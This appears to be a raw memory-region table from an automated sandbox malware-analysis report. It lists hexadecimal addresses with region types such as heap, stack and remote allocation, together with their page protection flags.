trusted library allocation
page read and write
5F30000
heap
page read and write
2FC2000
trusted library allocation
page read and write
5F38000
heap
page read and write
6EE9000
trusted library allocation
page read and write
7FF000D0000
trusted library allocation
page read and write
587E000
stack
page read and write
29E000
heap
page read and write
6F08000
trusted library allocation
page read and write
382E000
trusted library allocation
page read and write
358000
heap
page read and write
1320000
trusted library allocation
page read and write
347C000
trusted library allocation
page read and write
7769000
trusted library allocation
page read and write
1F05000
heap
page read and write
1B385000
heap
page read and write
820000
trusted library allocation
page read and write
405000
heap
page read and write
50000
unkown
page readonly
552000
remote allocation
page execute and read and write
1B3BD000
heap
page read and write
60D000
heap
page read and write
12B41000
trusted library allocation
page read and write
3840000
trusted library allocation
page read and write
6AC000
heap
page read and write
50000
unkown
page readonly
5CED000
heap
page read and write
D20000
heap
page read and write
60000
unkown
page readonly
3A13000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
1BA2A000
trusted library allocation
page read and write
7FF000E0000
trusted library allocation
page read and write
246000
heap
page read and write
2B6F000
trusted library allocation
page read and write
12C31000
trusted library allocation
page read and write
72FB000
trusted library allocation
page read and write
305B000
trusted library allocation
page read and write
762D000
trusted library allocation
page read and write
709C000
trusted library allocation
page read and write
825000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
5A1C000
trusted library allocation
page read and write
2889000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
3A2B000
trusted library allocation
page read and write
12CB1000
trusted library allocation
page read and write
7FF00122000
trusted library allocation
page execute and read and write
4AEF000
stack
page read and write
395D000
trusted library allocation
page read and write
2AC0000
heap
page execute and read and write
1307000
trusted library allocation
page read and write
57E6000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
2ED7000
trusted library allocation
page read and write
3989000
trusted library allocation
page read and write
1B1D0000
heap
page read and write
55E0000
trusted library allocation
page read and write
1240000
trusted library allocation
page read and write
1AB000
stack
page read and write
10000
heap
page read and write
38AB000
trusted library allocation
page read and write
2E39000
trusted library allocation
page read and write
1A5000
heap
page read and write
1C94E000
stack
page read and write
37F2000
trusted library allocation
page read and write
14A000
trusted library allocation
page execute and read and write
5990000
trusted library allocation
page read and write
1BC3E000
stack
page read and write
71B6000
trusted library allocation
page read and write
2EED000
trusted library allocation
page read and write
1C82E000
stack
page read and write
87A000
heap
page read and write
7FF00032000
trusted library allocation
page execute and read and write
6ED000
heap
page read and write
DD9000
trusted library allocation
page read and write
72EC000
trusted library allocation
page read and write
53A5000
heap
page read and write
124000
trusted library allocation
page read and write
285F000
stack
page read and write
487E000
stack
page read and write
3A25000
trusted library allocation
page read and write
1BA30000
trusted library allocation
page read and write
34E3000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
52C0000
trusted library allocation
page read and write
6B8000
heap
page read and write
3045000
trusted library allocation
page read and write
3BC000
heap
page read and write
71BC000
trusted library allocation
page read and write
2F73000
trusted library allocation
page read and write
1332000
unkown
page execute read
820000
trusted library allocation
page read and write
359E000
trusted library allocation
page read and write
3860000
trusted library allocation
page read and write
7222000
trusted library allocation
page read and write
5A76000
unkown
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
2850000
trusted library allocation
page read and write
3479000
trusted library allocation
page read and write
3E2000
heap
page read and write
C20000
trusted library allocation
page read and write
190000
trusted library allocation
page execute and read and write
409000
heap
page read and write
39C2000
trusted library allocation
page read and write
2E24000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
35BD000
trusted library allocation
page read and write
4925000
trusted library allocation
page read and write
440000
heap
page read and write
210000
heap
page read and write
60F000
heap
page read and write
3A47000
trusted library allocation
page read and write
6E3E000
stack
page read and write | page guard
6B2E000
trusted library allocation
page read and write
763D000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
2EA8000
trusted library allocation
page read and write
7A47000
trusted library allocation
page read and write
1B54D000
stack
page read and write
E20000
trusted library allocation
page read and write
74DB000
trusted library allocation
page read and write
80DB000
trusted library allocation
page read and write
2AA0000
heap
page read and write
1CB000
trusted library allocation
page execute and read and write
D2E000
stack
page read and write
142000
trusted library allocation
page read and write
310000
trusted library allocation
page read and write
10000
heap
page read and write
7215000
trusted library allocation
page read and write
2140000
heap
page read and write
7481000
trusted library allocation
page read and write
60000
unkown
page readonly
1B4B0000
trusted library allocation
page read and write
1240000
trusted library allocation
page read and write
6B2000
heap
page read and write
3B37000
trusted library allocation
page read and write
574E000
stack
page read and write
35CD000
trusted library allocation
page read and write
1BA34000
trusted library allocation
page read and write
157000
trusted library allocation
page execute and read and write
2CEF000
trusted library allocation
page read and write
721F000
trusted library allocation
page read and write
4EF000
stack
page read and write
2B9F000
trusted library allocation
page read and write
37F5000
trusted library allocation
page read and write
50000
unkown
page readonly
A70000
trusted library allocation
page read and write
33E4000
trusted library allocation
page read and write
54D000
remote allocation
page execute and read and write
60C000
heap
page read and write
6F95000
trusted library allocation
page read and write
6170000
trusted library allocation
page read and write
5EB0000
trusted library allocation
page read and write
577C000
heap
page read and write
53B0000
trusted library allocation
page read and write
2FD8000
trusted library allocation
page read and write
390000
heap
page read and write
6E4B000
trusted library allocation
page read and write
399B000
trusted library allocation
page read and write
1B36A000
trusted library allocation
page read and write
310000
heap
page read and write
69EE000
stack
page read and write
804C000
trusted library allocation
page read and write
3A50000
trusted library allocation
page read and write
2FED000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
7EEA000
trusted library allocation
page read and write
1240000
trusted library allocation
page read and write
327D000
trusted library allocation
page read and write
49B0000
heap
page execute and read and write
118F000
stack
page read and write
7FF00132000
trusted library allocation
page execute and read and write
7FF001D0000
trusted library allocation
page read and write
1CA4000
heap
page read and write
2916000
heap
page read and write
5CD8000
heap
page read and write
5770000
heap
page read and write
2ABC000
trusted library allocation
page read and write
54FE000
stack
page read and write
185000
stack
page read and write | page guard
436000
heap
page read and write
54E000
stack
page read and write
D0000
heap
page read and write
1080000
trusted library allocation
page read and write
C50000
trusted library allocation
page read and write
147000
trusted library allocation
page execute and read and write
7149000
trusted library allocation
page read and write
3814000
trusted library allocation
page read and write
3811000
trusted library allocation
page read and write
3601000
trusted library allocation
page read and write
35CA000
trusted library allocation
page read and write
ADE000
stack
page read and write
2F17000
trusted library allocation
page read and write
57FD000
trusted library allocation
page read and write
3042000
trusted library allocation
page read and write
7209000
trusted library allocation
page read and write
5A53000
trusted library allocation
page read and write
E4E000
trusted library allocation
page read and write
350000
heap
page read and write
342A000
trusted library allocation
page read and write
B1F000
stack
page read and write
10000
heap
page read and write
5890000
trusted library allocation
page execute and read and write
3D9000
heap
page read and write
2FBC000
trusted library allocation
page read and write
854000
heap
page read and write
5B2E000
stack
page read and write
1190000
trusted library allocation
page read and write
156000
heap
page read and write
1EB000
stack
page read and write
24B4000
heap
page read and write
38AA000
trusted library allocation
page read and write
686E000
stack
page read and write
6A2000
heap
page read and write
35DD000
trusted library allocation
page read and write
7176000
trusted library allocation
page read and write
6ABE000
trusted library allocation
page read and write
2DFC000
trusted library allocation
page read and write
20BA000
heap
page read and write
3410000
trusted library allocation
page read and write
573D000
trusted library allocation
page read and write
2F1B000
trusted library allocation
page read and write
10000
heap
page read and write
34D5000
trusted library allocation
page read and write
752000
heap
page read and write
757F000
stack
page read and write
DC6000
trusted library allocation
page read and write
582C000
trusted library allocation
page read and write
35E3000
trusted library allocation
page read and write
340000
trusted library allocation
page read and write
D10000
trusted library allocation
page read and write
68AE000
stack
page read and write
612000
heap
page read and write
6FC0000
trusted library allocation
page read and write
3831000
trusted library allocation
page read and write
1CFB000
heap
page read and write
71BE000
trusted library allocation
page read and write
80E1000
trusted library allocation
page read and write
8E0000
heap
page read and write
3A4C000
trusted library allocation
page read and write
2DA8000
trusted library allocation
page read and write
2E94000
trusted library allocation
page read and write
806000
heap
page read and write
5F1F000
heap
page read and write
5954000
heap
page read and write
890000
heap
page execute and read and write
757E000
stack
page read and write | page guard
38C8000
trusted library allocation
page read and write
1C830000
heap
page read and write
667000
heap
page read and write
3039000
trusted library allocation
page read and write
6F60000
trusted library allocation
page read and write
5E8E000
stack
page read and write
9E5000
trusted library allocation
page read and write
1FEF000
stack
page read and write
4930000
heap
page read and write
33C000
stack
page read and write
2FFA000
trusted library allocation
page read and write
3909000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page read and write
23B0000
heap
page read and write
3643000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
1B4ED000
heap
page read and write
5C4F000
stack
page read and write
767000
heap
page read and write
3796000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
389A000
trusted library allocation
page read and write
5F14000
heap
page read and write
2EF3000
trusted library allocation
page read and write
3C0000
trusted library allocation
page read and write
1A9000
heap
page read and write
2DD2000
trusted library allocation
page read and write
37C5000
trusted library allocation
page read and write
75C6000
trusted library allocation
page read and write
9D0000
trusted library section
page read and write
49A0000
trusted library allocation
page read and write
275000
stack
page read and write | page guard
CC0000
heap
page read and write
B1E000
stack
page read and write | page guard
71D7000
trusted library allocation
page read and write
12B4000
heap
page read and write
10000
heap
page read and write
8C5E000
stack
page read and write
56D4000
trusted library allocation
page read and write
3792000
trusted library allocation
page read and write
2D49000
trusted library allocation
page read and write
6180000
trusted library allocation
page read and write
7635000
trusted library allocation
page read and write
3141000
trusted library allocation
page read and write
B80000
trusted library allocation
page read and write
1F0000
trusted library allocation
page execute and read and write
1240000
trusted library allocation
page read and write
2A5E000
stack
page read and write | page guard
916000
heap
page read and write
6DCF000
stack
page read and write
9E0000
trusted library allocation
page read and write
3437000
trusted library allocation
page read and write
2E46000
trusted library allocation
page read and write
20A5000
heap
page read and write
2E09000
trusted library allocation
page read and write
1CE000
heap
page read and write
C30000
trusted library allocation
page read and write
286E000
stack
page read and write | page guard
3900000
trusted library allocation
page read and write
2D6B000
trusted library allocation
page read and write
C30000
trusted library allocation
page read and write
3A21000
trusted library allocation
page read and write
1E40000
heap
page read and write
7FF00270000
trusted library allocation
page read and write
6F2C000
trusted library allocation
page read and write
716F000
trusted library allocation
page read and write
756E000
trusted library allocation
page read and write
6B90000
trusted library allocation
page read and write
12B45000
trusted library allocation
page read and write
7337000
trusted library allocation
page read and write
6E5F000
trusted library allocation
page read and write
1310000
trusted library allocation
page read and write
6BA2000
trusted library allocation
page read and write
1C6CE000
stack
page read and write
2D6D000
trusted library allocation
page read and write
2E0A000
trusted library allocation
page read and write
420000
heap
page read and write
12F62000
trusted library allocation
page read and write
7FF00240000
trusted library allocation
page execute and read and write
74C000
heap
page read and write
290F000
stack
page read and write
5811000
trusted library allocation
page read and write
6F31000
trusted library allocation
page read and write
C6E000
stack
page read and write
31EF000
trusted library allocation
page read and write
38BD000
trusted library allocation
page read and write
7FF00112000
trusted library allocation
page execute and read and write
7EFE0000
unkown
page readonly
616E000
stack
page read and write | page guard
2EBC000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
306B000
trusted library allocation
page read and write
2F6E000
trusted library allocation
page read and write
2FF6000
trusted library allocation
page read and write
5F10000
heap
page read and write
1CA0000
heap
page read and write
7671000
trusted library allocation
page read and write
3973000
trusted library allocation
page read and write
2D4F000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
4927000
trusted library allocation
page read and write
383A000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
2E82000
trusted library allocation
page read and write
386A000
trusted library allocation
page read and write
19B000
trusted library allocation
page execute and read and write
82F000
trusted library allocation
page read and write
7FF001F0000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
2EF9000
trusted library allocation
page read and write
4EC0000
heap
page read and write
53CE000
stack
page read and write
2894000
trusted library allocation
page read and write
3909000
trusted library allocation
page read and write
194000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page read and write
1B360000
trusted library allocation
page read and write
3875000
trusted library allocation
page read and write
760000
heap
page read and write
1F3B000
heap
page read and write
C20000
trusted library allocation
page read and write
5A76000
trusted library allocation
page read and write
717A000
trusted library allocation
page read and write
3A36000
trusted library allocation
page read and write
1B46B000
heap
page read and write
12B01000
trusted library allocation
page read and write
7147000
trusted library allocation
page read and write
3670000
trusted library allocation
page read and write
393C000
trusted library allocation
page read and write
152000
trusted library allocation
page read and write
8D9F000
stack
page read and write
430000
heap
page read and write
7FF0003C000
trusted library allocation
page execute and read and write
5A18000
trusted library allocation
page read and write
500000
heap
page read and write
2FD7000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
396F000
trusted library allocation
page read and write
5860000
trusted library allocation
page read and write
12D90000
trusted library allocation
page read and write
3463000
trusted library allocation
page read and write
38C4000
trusted library allocation
page read and write
28D0000
heap
page read and write
C30000
trusted library allocation
page read and write
9E0000
trusted library allocation
page read and write
2CDF000
trusted library allocation
page read and write
7584000
trusted library allocation
page read and write
5BA0000
trusted library allocation
page read and write
380B000
trusted library allocation
page read and write
2DF000
stack
page read and write
6C22000
trusted library allocation
page read and write
1BB9E000
stack
page read and write
7FF001E0000
trusted library allocation
page read and write
2990000
trusted library allocation
page read and write
87D000
heap
page read and write
14A000
trusted library allocation
page execute and read and write
1E70000
trusted library allocation
page read and write
67D8000
trusted library allocation
page read and write
19D000
trusted library allocation
page execute and read and write
2DCA000
trusted library allocation
page read and write
7AA000
heap
page read and write
1A0000
trusted library allocation
page read and write
3434000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3A47000
trusted library allocation
page read and write
343D000
trusted library allocation
page read and write
2DCE000
trusted library allocation
page read and write
130000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
B30000
heap
page execute and read and write
7207000
trusted library allocation
page read and write
12AE000
stack
page read and write
2C70000
heap
page execute and read and write
56A8000
trusted library allocation
page read and write
DE0000
trusted library allocation
page read and write
BEF000
stack
page read and write
75FB000
trusted library allocation
page read and write
6BCE000
stack
page read and write | page guard
There are 1749 hidden memdumps, click here to show them.